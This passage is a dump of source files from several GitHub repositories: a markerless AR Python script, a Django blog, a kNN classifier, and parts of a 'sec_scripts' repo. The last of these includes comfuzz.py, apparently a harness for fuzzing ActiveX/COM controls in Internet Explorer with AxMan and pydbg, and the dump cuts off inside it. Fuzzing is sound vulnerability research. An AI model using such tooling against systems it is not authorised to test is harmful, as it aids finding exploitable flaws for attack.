"1982026927/Markerless-AR", "src_encoding": "UTF-8", "text": "import math\nimport cv2\nimport numpy as np\nimport argparse\nfrom imutils import contours\nimport imutils\nfrom skimage.filters import threshold_adaptive\nfrom matplotlib import pyplot as plt\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport pygame, pygame.image\nfrom pygame.locals import *\nimport pickle\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\nfrom scipy import linalg\n\n\nclass Camera(object):\n '''\n Class for representing pin-hole cameras.\n '''\n\n def __init__(self,P):\n '''\n Initialize P = K[R|t] camera model.\n '''\n self.P = P\n self.K = None # calibration matrix\n self.R = None # rotation\n self.t = None # translation\n self.c = None # camera center\n\n\n def project(self,X):\n '''\n Project points in X (4*n array) and normalize coordinates.\n '''\n\n x = np.dot(self.P,X)\n for i in range(3):\n x[i] /= x[2]\n return x\n\ndef resizeImage(image, width, height):\n '''\n Resizes an image and returns the resized image name\n '''\n resizingImg = Image.open(image)\n\n newImg = resizingImg.resize((width, height), Image.ANTIALIAS)\n newImg.save(image)\n\n return image\n\n\ndef order_points(pts):\n '''\n Order an array of points\n '''\n # initialzie a list of coordinates that will be ordered\n # such that the first entry in the list is the top-left,\n # the second entry is the top-right, the third is the\n # bottom-right, and the fourth is the bottom-left\n rect = np.zeros((4, 2), dtype = \"float32\")\n\n # the top-left point will have the smallest sum, whereas\n # the bottom-right point will have the largest sum\n s = pts.sum(axis = 1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = pts[np.argmax(s)]\n\n # now, compute the difference between the points, the\n # top-right point will have the smallest difference,\n # whereas the bottom-left will have the largest difference\n diff = np.diff(pts, axis = 1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n\n # return the ordered coordinates\n return rect\n\ndef four_point_transform(image, pts):\n '''\n Warps image to get clean, top view\n '''\n # obtain a consistent order of the points and unpack them\n # individually\n rect = order_points(pts)\n (tl, tr, br, bl) = rect\n\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n\n # compute the height of the new image, which will be the\n # maximum distance between the top-right and bottom-right\n # y-coordinates or the top-left and bottom-left y-coordinates\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left\n # order\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype = \"float32\")\n\n # compute the perspective transform matrix and then apply it\n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n\n # return the warped image\n return warped\n\ndef transformSurface(image):\n '''\n Apply transform to make query image\n '''\n screenCnt = None\n ratio = image.shape[0] / 500.0\n orig = image.copy()\n image = imutils.resize(image, height = 500)\n\n # convert the image to grayscale, blur it, and find edges\n # in the image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(gray, 75, 200)\n\n # show the original image and the edge detected image\n #print \"STEP 1: Edge Detection\"\n # cv2.imshow(\"Image\", image)\n #cv2.imwrite(\"imgs/edged.jpg\", edged)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # find the contours in the edged image, keeping only the\n # largest ones, and initialize the screen contour\n (cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n\n # loop over the contours\n for c in cnts:\n # approximate the contour\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n\n # if our approximated contour has four points, then we\n # can assume that we have found our screen\n if len(approx) == 4:\n screenCnt = approx\n print screenCnt\n break\n\n # show the contour (outline) of the piece of paper\n #print \"STEP 2: Find contours of paper\"\n # cv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 2)\n # cv2.imwrite(\"imgs/outline.jpg\", image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n if screenCnt is not None:\n # apply the four point transform to obtain a top-down\n # view of the original image\n warped = four_point_transform(orig, screenCnt.reshape(4, 2) * ratio)\n\n\n # show the original and scanned images\n #print \"STEP 3: Apply perspective transform\"\n # cv2.imshow(\"Original\", imutils.resize(orig, height = 650))\n # cv2.imshow(\"Scanned\", imutils.resize(warped, height = 650))\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n cv2.imwrite(\"imgs/query.jpg\", warped)\n\n\ndef drawMatches(img1, kp1, img2, kp2, matches):\n '''\n Draws matched keypoints\n '''\n # Create a new output image that concatenates the two images together\n # (a.k.a) a montage\n rows1 = img1.shape[0]\n cols1 = img1.shape[1]\n rows2 = img2.shape[0]\n cols2 = img2.shape[1]\n\n # Create the output image\n # The rows of the output are the largest between the two images\n # and the columns are simply the sum of the two together\n # The intent is to make this a colour image, so make this 3 channels\n out = np.zeros((max([rows1,rows2]),cols1+cols2,3), dtype='uint8')\n\n # Place the first image to the left\n out[:rows1,:cols1] = np.dstack([img1, img1, img1])\n\n # Place the next image to the right of it\n out[:rows2,cols1:] = np.dstack([img2, img2, img2])\n\n # For each pair of points we have between both images\n # draw circles, then connect a line between them\n for mat in matches:\n\n # Get the matching keypoints for each of the images\n img1_idx = mat[0].queryIdx\n img2_idx = mat[0].trainIdx\n\n # x - columns\n # y - rows\n (x1,y1) = kp1[img1_idx].pt\n (x2,y2) = kp2[img2_idx].pt\n\n # Draw a small circle at both co-ordinates\n # radius 4\n # colour blue\n # thickness = 1\n cv2.circle(out, (int(x1),int(y1)), 4, (255, 0, 0), 1)\n cv2.circle(out, (int(x2)+cols1,int(y2)), 4, (255, 0, 0), 1)\n\n # Draw a line in between the two points\n # thickness = 1\n # colour blue\n cv2.line(out, (int(x1),int(y1)), (int(x2)+cols1,int(y2)), (255,0,0), 1)\n\n\n cv2.imwrite(\"imgs/orb.jpg\", out)\n\n\ndef orb(img1,img2):\n '''\n Detect and compute keypoints and descriptors to find refined homography\n '''\n refinedM = None\n roughM = None\n query = cv2.imread(img1,0) # queryImage\n scene = img2 # trainImage\n h, w = scene.shape[:2]\n\n # Initiate ORB detector\n orb = cv2.ORB()\n\n # find the keypoints and descriptors with ORB\n kp1, des1 = orb.detectAndCompute(query,None)\n kp2, des2 = orb.detectAndCompute(scene,None)\n\n # create BFMatcher object\n bf = cv2.BFMatcher()\n #returns list of lists of matches\n matches = bf.knnMatch(des1,des2, k=2)\n\n # Apply ratio test\n good = []\n for m,n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m])\n\n #drawMatches(img1, kp1, img2, kp2, good[:])\n\n MIN_MATCH_COUNT = 10\n\n if len(good)>MIN_MATCH_COUNT:\n src_pts = np.float32([ kp1[m[0].queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp2[m[0].trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n roughM, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\n if roughM is None:\n return None\n else:\n\n\n '''\n Second pass to refine homography\n '''\n warp = cv2.warpPerspective(scene, roughM, (w, h), flags=cv2.WARP_INVERSE_MAP+cv2.INTER_CUBIC)\n cv2.imwrite(\"imgs/warp.jpg\", warp)\n warpedScene = cv2.imread(\"imgs/warp.jpg\",0) # queryImage\n\n # Initiate ORB detector\n orb = cv2.ORB()\n\n # find the keypoints and descriptors with ORB\n kp1, des1 = orb.detectAndCompute(query,None)\n kp2, des2 = orb.detectAndCompute(warpedScene,None)\n\n # create BFMatcher object\n bf = cv2.BFMatcher()\n #returns list of lists of matches\n matches = bf.knnMatch(des1,des2, k=2)\n\n # Apply ratio test\n good = []\n for m,n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m])\n\n #drawMatches(img1, kp1, img2, kp2, good[:])\n\n MIN_MATCH_COUNT = 10\n if len(good)>MIN_MATCH_COUNT:\n src_pts = np.float32([ kp1[m[0].queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp2[m[0].trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n refinedM, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\n if refinedM is None:\n return None\n else:\n resultM = np.matmul(roughM, refinedM)\n '''\n '''\n\n h,w = query.shape\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n dst = cv2.perspectiveTransform(pts,resultM)\n\n corners = [np.int32(dst)]\n # draws the outline of the query img as it would be found in the scene\n #cv2.polylines(warpedScene,corners,True,255,3, cv2.CV_AA)\n\n\n else:\n print \"Not enough matches are found - %d/%d\" % (len(good),MIN_MATCH_COUNT)\n matchesMask = None\n return None\n\n\n #drawMatches(query,kp1,warpedScene,kp2,good[:])\n\n return (corners,resultM)\n\n\n\ndef draw_background(imname, sz):\n '''\n Draw background image using a quad. The quad is defined with corners at\n -1 and1 in both dimensions. Use this for translating object\n '''\n\n # load background image (should be .bmp) to OpenGL texture\n bg_image = pygame.image.load(imname).convert()\n bg_image = pygame.transform.scale(bg_image, sz)\n bg_data = pygame.image.tostring(bg_image,\"RGBX\",1)\n\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n # bind the texture\n glEnable(GL_TEXTURE_2D)\n glBindTexture(GL_TEXTURE_2D,glGenTextures(1))\n glTexImage2D(GL_TEXTURE_2D,0,GL_RGBA,sz[0],sz[1],0,GL_RGBA,GL_UNSIGNED_BYTE,bg_data)\n glTexParameterf(GL_TEXTURE_2D,GL_TEXTURE_MAG_FILTER,GL_NEAREST)\n glTexParameterf(GL_TEXTURE_2D,GL_TEXTURE_MIN_FILTER,GL_NEAREST)\n\n # create quad to fill the whole window\n glBegin(GL_QUADS)\n glTexCoord2f(0.0,0.0); glVertex3f(-1.0,-1.0,-1.0)\n glTexCoord2f(1.0,0.0); glVertex3f( 1.0,-1.0,-1.0)\n glTexCoord2f(1.0,1.0); glVertex3f( 1.0, 1.0,-1.0)\n glTexCoord2f(0.0,1.0); glVertex3f(-1.0, 1.0,-1.0)\n glEnd()\n\n # clear the texture\n glDeleteTextures(1)\n\n\ndef draw_teapot(size):\n '''\n Draw a red teapot at the origin.\n '''\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT0)\n glEnable(GL_DEPTH_TEST)\n glClear(GL_DEPTH_BUFFER_BIT)\n\n # draw red teapot\n glMaterialfv(GL_FRONT,GL_AMBIENT,[0,0,0,0])\n glMaterialfv(GL_FRONT,GL_DIFFUSE,[0.5,0.0,0.0,0.0])\n glMaterialfv(GL_FRONT,GL_SPECULAR,[0.7,0.6,0.6,0.0])\n glMaterialf(GL_FRONT,GL_SHININESS,0.25*128.0)\n glutSolidTeapot(size)\n\ndef setup():\n '''\n Setup window and pygame environment.\n '''\n pygame.init()\n display = (800, 747)\n window = pygame.display.set_mode(display,DOUBLEBUF|OPENGL)\n return window\n\ndef my_calibration(sz):\n '''\n Calculate camera intrinsic parameters\n '''\n row,col = sz\n fx = 2555*col/col\n fy = 2586*row/row\n K = np.diag([fx,fy,1])\n K[0,2] = 0.5*col\n K[1,2] = 0.5*row\n return K\n\n\ndef set_projection_from_camera(K, sz, x, y, z):\n '''\n Translates the camera properties to an OpenGL projection matrix\n '''\n #matrix = cv2.calibrationMatrixValues(mtx, sz, aperture[0], aperture[1])\n\n # glMatrixMode() sets the working matrix to GL_PROJECTION\n # subsequent commands will modify this matrix\n glMatrixMode(GL_PROJECTION)\n # sets the matrix to the identity matrix, reseting any prior changes\n glLoadIdentity()\n\n # calculate the vertical field of view in degrees\n fx = K[0,0]\n fy = K[1,1]\n fovy = 2*np.arctan(0.5*sz[1]/fy)*sz[0]/np.pi\n aspect = (sz[0]*fy)/(sz[1]*fx)\n\n # define near and far clipping planes which limit depth range of what is rendered\n near = 0.1\n far = 100.0\n\n # set the projection matrix\n gluPerspective(fovy,aspect,near,far)\n # move object around view\n glTranslatef(x, y, z)\n # define the whole image to be the view port (essentially what is to be shown)\n glViewport(0,0,sz[0],sz[1])\n\n\ndef set_modelview_from_camera(Rt):\n '''\n Set the model view matrix from camera pose.\n '''\n\n # glMatrixMode() sets the working matrix to GL_MODELVIEW\n # subsequent commands will modify this matrix\n glMatrixMode(GL_MODELVIEW)\n # sets the matrix to the identity matrix, reseting any prior changes\n glLoadIdentity()\n\n # rotate teapot 90 deg around x-axis so that z-axis is up\n Rx = np.array([[1,0,0],[0,0,-1],[0,1,0]])\n\n # set rotation to best approximation\n R = Rt[:,:3]\n U,S,V = linalg.svd(R)\n R = np.dot(U,V)\n R[0,:] = -R[0,:] # change sign of x-axis\n\n # set translation\n t = Rt[:,3]\n\n # setup 4*4 model view matrix\n M = np.eye(4)\n M[:3,:3] = np.dot(R,Rx)\n M[:3,3] = t\n\n # transpose and flatten to get column order\n M = M.T\n m = M.flatten()\n\n # replace model view with the new matrix\n glLoadMatrixf(m)\n\n\ndef load_and_draw_model(filename):\n \"\"\"\n Loads a model from an .obj file using objloader.py.\n Assumes there is a .mtl material file with the same name.\n \"\"\"\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT0)\n glEnable(GL_DEPTH_TEST)\n glClear(GL_DEPTH_BUFFER_BIT)\n\n # set model color\n glMaterialfv(GL_FRONT,GL_AMBIENT,[0,0,0,0])\n glMaterialfv(GL_FRONT,GL_DIFFUSE,[0.5,0.75,1.0,0.0])\n glMaterialf(GL_FRONT,GL_SHININESS,0.25*128.0)\n\n # load from a file\n import objloader\n obj = objloader.OBJ(filename,swapyz=True)\n glCallList(obj.gl_list)\n\n\ndef drawScene():\n cap = cv2.VideoCapture(0)\n while(cap.isOpened()):\n xaxis = 0\n yaxis = 0\n zaxis = 0\n ret, frame = cap.read()\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glLoadIdentity()\n glTranslatef(0.0,0.0,-7.0)\n glRotatef(x,1.0,0.0,0.0)\n glRotatef(y,0.0,1.0,0.0)\n glRotatef(z,0.0,0.0,1.0)\n\n x -= .30\n z -= 30\n\n glutSwapBuffers()\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\ndef initGl(width,height):\n glClearColor(0.0,0.0,0.0,0.0)\n glClearDepth(1.0)\n glDepthFunc(GL_LESS)\n glEnable(GL_DEPTH_TEST)\n glShadeModel(GL_SMOOTH)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45.0, float(width)/float(height),0.1, 100.0)\n glMatrixMode(GL_MODELVIEW)\n\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glEnable(GL_TEXTURE_2D)\n\ndef reshape(width, height):\n glViewport(0, 0, width, height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45.0, float(width)/float(height), 0.1, 100.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n gluLookAt(0.0, 0.0, 5.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0)\n\n###############################################################################\n###############################################################################\n'''\nTODO:\n - dynamic placement of objects\n - load 3d objects\n'''\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-s\", \"--sceneVideo\", required=True,\n\thelp=\"name of input video\")\nargs = vars(ap.parse_args())\n\nquery = None\nwindow = setup()\n\n# 1 = webcam\ncap = cv2.VideoCapture(\"imgs/\" + args[\"sceneVideo\"])\nwhile(cap.isOpened()):\n ret, scene = cap.read()\n\n '''\n Feature matching\n '''\n if query is None:\n # extract receipt from the scene\n transformSurface(scene)\n\n query = \"imgs/query.jpg\"\n #scene = \"imgs/\"+args[\"sceneImage\"]\n\n\n gray = cv2.cvtColor(scene,cv2.COLOR_BGR2GRAY)\n imHeight, imWidth = gray.shape[:2]\n\n # perform feature matching and calculate homography\n corners = orb(query,scene)\n if corners is None:\n continue\n else:\n homography = corners[1]\n '''\n '''\n\n '''\n Calibration\n '''\n # calibrations = np.load(\"calibrate.npz\")\n # mtx = calibrations['mtx'] #camera intrinsic parameters\n # dist = calibrations['dist']\n # rvecs = calibrations['rvecs']\n # tvecs = calibrations['tvecs']\n\n\n # intrinsic matrix K\n K = my_calibration((imWidth, imHeight))\n\n # camera matrix for query image\n cam1 = Camera( np.hstack((K,np.dot(K,np.array([[0],[0],[-1]])) )) )\n # camera matrix for scene image\n cam2 = Camera(np.dot(homography,cam1.P))\n\n # The first two columns and the fourth column of cam2.P are correct.\n # Since we know that the first 3x3 block should be KR and R is a rotation matrix,\n # we can correct the third column by multiplying cam2.P with the inverse of the\n # calibration matrix and replacing the third column with the cross product of the first two.\n A = np.dot(linalg.inv(K),cam2.P[:,:3])\n A = np.array([A[:,0],A[:,1],np.cross(A[:,0],A[:,1])]).T\n\n # camera pose [R|t]\n cam2.P[:,:3] = np.dot(K,A)\n Rt = np.dot(linalg.inv(K),cam2.P)\n '''\n '''\n\n '''\n 3d rendering\n '''\n # make .bmp file of scene for OpenGL\n cv2.imwrite( 'imgs/3dpoint.bmp', scene)\n\n #render object\n sz = (800, 747)\n draw_background(\"imgs/3dpoint.bmp\", sz)\n # repeat next three lines to render multiple objs\n # changing the 3 decimal values to the position of choice\n set_projection_from_camera(K,sz, 0.0, 0.0, 0.0)\n set_modelview_from_camera(Rt)\n #load_and_draw_model('toyplane.obj')\n draw_teapot(0.09)\n\n event = pygame.event.poll()\n if event.type in (QUIT,KEYDOWN):\n break\n pygame.display.flip()\n pygame.time.wait(1)\n\n\n cv2.imshow('frame',scene)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n" } ]
2
dongjun2000/blogproject
https://github.com/dongjun2000/blogproject
a540cd8895f3c639b770d0848c045283c4fd8e46
de133c411511d115dd497675cb6f990d19848689
fb95e2b212925bd9cc5f21f15eff9b9b48a171e1
refs/heads/master
2018-12-19T16:03:47.796510
2018-09-17T07:16:35
2018-09-17T07:16:35
148,977,715
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6345177888870239, "alphanum_fraction": 0.6446700692176819, "avg_line_length": 27.14285659790039, "blob_id": "4b1c8bde4fb7271d215a00b0558d8015c9897430", "content_id": "ccc92caa0366927a3a3037b06903e867a35280e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 76, "num_lines": 7, "path": "/blog/urls.py", "repo_name": "dongjun2000/blogproject", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='blog_index'),\n url(r'^article/(?P<blog_id>[0-9]+)', views.article, name='blog_article')\n]\n" }, { "alpha_fraction": 0.7563636302947998, "alphanum_fraction": 0.7563636302947998, "avg_line_length": 29.55555534362793, "blob_id": "8775b993c87768bda99db02134e34eeba938d1e3", "content_id": "c70aff01ba1e4f1cc42144ecacb2cfda425a9624", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 83, "num_lines": 9, "path": "/blog/admin.py", "repo_name": "dongjun2000/blogproject", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom . import models\n\nadmin.site.register(models.Category)\nadmin.site.register(models.Tag)\n\[email protected](models.Entry)\nclass EntryAdmin(admin.ModelAdmin):\n list_display = ['title', 'author', 'visiting', 'created_time', 'modifyed_time']\n" }, { "alpha_fraction": 0.6711185574531555, "alphanum_fraction": 0.6727879643440247, "avg_line_length": 25.04347801208496, "blob_id": "0460939f253f18a78e2f47c61a2246742cb143fc", "content_id": "6d1af1eab0a7df6c7313d3c071e170d081f3895c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 603, "license_type": "no_license", "max_line_length": 52, "num_lines": 23, "path": "/blog/views.py", "repo_name": "dongjun2000/blogproject", "src_encoding": "UTF-8", "text": "import markdown, pygments\n\nfrom django.shortcuts import render\nfrom . import models\n\ndef index(request):\n entries = models.Entry.objects.all()\n\n return render(request, 'index.html', locals())\n\n\ndef article(request, blog_id):\n entry = models.Entry.objects.get(id=blog_id)\n md = markdown.Markdown(extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.toc',\n ])\n entry.body = md.convert(entry.body)\n entry.toc = md.toc\n # 访客 +1\n entry.increase_visiting()\n return render(request, 'article.html', locals())\n" } ]
3
ankitsharma1999/kNN
https://github.com/ankitsharma1999/kNN
c866325b8c3a66629d3d86c39d27682f82a86011
70870a249e219ef787bc60c4fc62a95c257cbbb2
43866d608de787d4a14f06872c598bec0617ec18
refs/heads/master
2020-07-24T19:30:57.260274
2019-09-12T10:30:04
2019-09-12T10:30:04
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8103448152542114, "alphanum_fraction": 0.8103448152542114, "avg_line_length": 28, "blob_id": "d1853cc9d14bbcb5de3522d90608cd1bbceecb97", "content_id": "cbcce356df7e952d90c44995c737b2f36d467b0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 58, "license_type": "no_license", "max_line_length": 51, "num_lines": 2, "path": "/README.md", "repo_name": "ankitsharma1999/kNN", "src_encoding": "UTF-8", "text": "# kNN\nA simple python script depicting the kNN classifier\n" }, { "alpha_fraction": 0.33203125, "alphanum_fraction": 0.4921875, "avg_line_length": 18.69230842590332, "blob_id": "790794ac2c77237c619c27a399bb1eaf357440cd", "content_id": "60d2d35741175459810ab611d2120095a5c44d57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 42, "num_lines": 13, "path": "/main.py", "repo_name": "ankitsharma1999/kNN", "src_encoding": "UTF-8", "text": "from mains import kNN\n\nX = [1, 1.5, 2, 2.5, 3, 5, 5.5, 6, 6.5, 7]\ny = [2, 2.5, 3, 1, 1.5, 6, 6.5, 7, 5, 5.5]\n\nX_train = list(zip(X, y))\ny_train = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1]\n\nclf = kNN(X_train, y_train, k=5)\n\nx_test = [1, 5]\n\nprint(clf.predict(x_test))\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5867347121238708, "avg_line_length": 19.102563858032227, "blob_id": "656ecca87ece909bb936bb9f628f5ee38075235b", "content_id": "fd0222a3895c6a1f73220c8ac8bfe3d440604010", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 784, "license_type": "no_license", "max_line_length": 69, "num_lines": 39, "path": "/mains.py", "repo_name": "ankitsharma1999/kNN", "src_encoding": "UTF-8", "text": "class kNN:\n\t\n\tdef __init__(self, x_train, y_train, k=5):\n\t\tself.k = k\n\t\tself.x_train = x_train\n\t\tself.y_train = y_train\n\t\n\tdef predict(self, x_test):\n\t\t\n\t\tdist = self.distance(self.x_train, x_test)\n\t\tlabels = self.y_train\n\t\t\n\t\tdist, labels = zip(*sorted(zip(dist, labels)))\n\t\ttop_k_entries = labels[0:self.k]\n\t\tclasses = self.unique(top_k_entries)\n\t\t\n\t\tpred = max(set(classes), key=classes.count)\n\t\treturn pred\n\t\n\tdef distance(self, x_train, x_test):\n\t\t\n\t\tdist = []\n\t\tx = x_test[0]\n\t\ty = x_test[1]\n\t\tfor j in range(len(x_train)):\n\t\t\td = (((x_train[j][0] - x) ** 2) + ((x_train[j][1] - y) ** 2))**0.5\n\t\t\tdist.append(d)\n\t\t\n\t\treturn dist\n\t\n\tdef unique(self, list1):\n\t\t\n\t\tunique_list = []\n\t\t\n\t\tfor x in list1:\n\t\t\tif x not in unique_list:\n\t\t\t\tunique_list.append(x)\n\t\t\n\t\treturn unique_list\n" } ]
3
ma11ock/sec_scripts
https://github.com/ma11ock/sec_scripts
b48c6c52ad763b3ac3035b7354800b615a9cd1ea
3c86205381eedf7a31ff1f4cd7d30a80c939227e
fb8171044002b5f5965b929092e5dee756a0e861
refs/heads/master
2020-12-11T21:27:48.323058
2018-03-23T17:26:47
2018-03-23T17:26:47
41,444,071
5
5
null
null
null
null
null
[ { "alpha_fraction": 0.6376811861991882, "alphanum_fraction": 0.6811594367027283, "avg_line_length": 18.785715103149414, "blob_id": "7e5d80667d2b0f277a899aab86687d7bb52d7c2f", "content_id": "ed9aea61767a42ca2d8c36cf151373a04da3a87d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 56, "num_lines": 14, "path": "/python/Module-3/client.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport socket, sys\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((sys.argv[1], 8000))\n\nwhile 1:\n userInput = input(\"please enter a string: \")\n sock.send(userInput)\n print sock.recv(2048)\n\nsock.close()" }, { "alpha_fraction": 0.36675822734832764, "alphanum_fraction": 0.44505494832992554, "avg_line_length": 25.925926208496094, "blob_id": "390e97be4f7743ee8d46170d9bfc5a20a5ed0fd5", "content_id": "2583346a2c3c19f347a0793a2f2a8e94cce2b7d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 728, "license_type": "no_license", "max_line_length": 131, "num_lines": 27, "path": "/ruby/buzzyfizzy.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "for i in 1..100 do\n print \"#{i.to_s}:\"\n if i % 5 == 0 && i % 3 == 0\n puts \"fizzbuzz\"\n elsif i % 3 == 0\n puts \"fizz\"\n elsif i % 5 == 0\n puts \"buzz\"\n end\nend\n\n1.upto(100) do |num|\n puts num.to_s\n if num % 15 == 0\n puts \"fizzbuzz\"\n elsif num % 3 == 0\n puts \"fizz\"\n elsif num % 5 == 0\n puts \"buzz\"\n end\nend\n\n(1..100).each{|num| puts num.to_s + \" : \" + (num % 15 == 0 ? \"fizzbuzz\" : (num % 3 == 0 ? \"fizz\" : (num % 5 == 0 ? \"buzz\" : \"\")))}\n\n1.upto(100) {|num| puts num.to_s + \" : \" + (num % 15 == 0 ? \"fizzbuzz\" : (num % 3 == 0 ? \"fizz\" : (num % 5 == 0 ? \"buzz\" : \"\")))}\n\n1.step(100,1) {|num| puts num.to_s + \" : \" + (num % 15 == 0 ? \"fizzbuzz\" : (num % 3 == 0 ? \"fizz\" : (num % 5 == 0 ? \"buzz\" : \"\")))}\n\n" }, { "alpha_fraction": 0.5875641703605652, "alphanum_fraction": 0.600114107131958, "avg_line_length": 28.233333587646484, "blob_id": "787b64a24e6aa405501f7f85c775539b6b66a9fc", "content_id": "317dd660517842da615bcd472100b16302e5f91c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1753, "license_type": "no_license", "max_line_length": 186, "num_lines": 60, "path": "/FaX/html/comfuzz.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n__author__ = 'm4lefic'\n\n# this is the User run script that finds all clsids for newly installed software\n\nimport sys, subprocess, os, comfuncs\nfrom comfuncs import *\n\nroot = 'C:\\\\fuzzer\\\\'\naxman_path = 'C:\\\\fuzzer\\\\axman\\\\bin'\nsave_dir = 'C:\\\\fuzzer\\\\html\\\\conf'\njs_file_folder1 = 'C:\\\\fuzzer\\\\axman\\\\bin\\\\js_folder1'\njs_file_folder2 = 'C:\\\\fuzzer\\\\axman\\\\bin\\\\js_folder2'\n\n\ndef create_files():\n\t\n\ttry:\n\t\tif sys.argv[1] == \"BASELINE\":\n\t\t\tbaseline_generate(axman_path, js_file_folder1)\n\t\t\tprint \"[+] completed - reboot\"\n\t\t\texit(0)\n\t\telif sys.argv[1] == \"-f\":\n\t\t\tpass\n\t\telif sys.argv[1] == \"TARGET\":\n\t\t\tdiff_generate(axman_path, js_file_folder1, js_file_folder2, save_dir)\n\t\t\tprint \"[+] completed - reboot\"\n\t\t\texit(0)\n\texcept:\n\t\tprint \"-------------------------\"\n\t\tprint \"[1] comfuzz.py BASELINE \"\n\t\tprint \"-------------------------\"\n\t\tprint \"[2] comfuzz.py TARGET \"\n\t\tprint \"-------------------------\"\n\t\tprint \"[3] comfuzz.py -f \"\n\t\tprint \"-------------------------\"\n\t\texit(0)\n\ndef execute():\n\tclsid=\"\"\n\tcreate_files()\t\n\tsubprocess.Popen(['python',root+'tcpserver.py'])\n\n\tfor files in os.listdir(save_dir):\n\t\tif match_clsid_pattern(files):\n\t\t\tclsid = files[0:-3]\n\n\t\tprint \"[+] Fuzzing \", clsid\n\t\tsubprocess.call(['python',root+'html\\\\pydbg_script.py', 'C:\\\\Program Files\\\\Internet 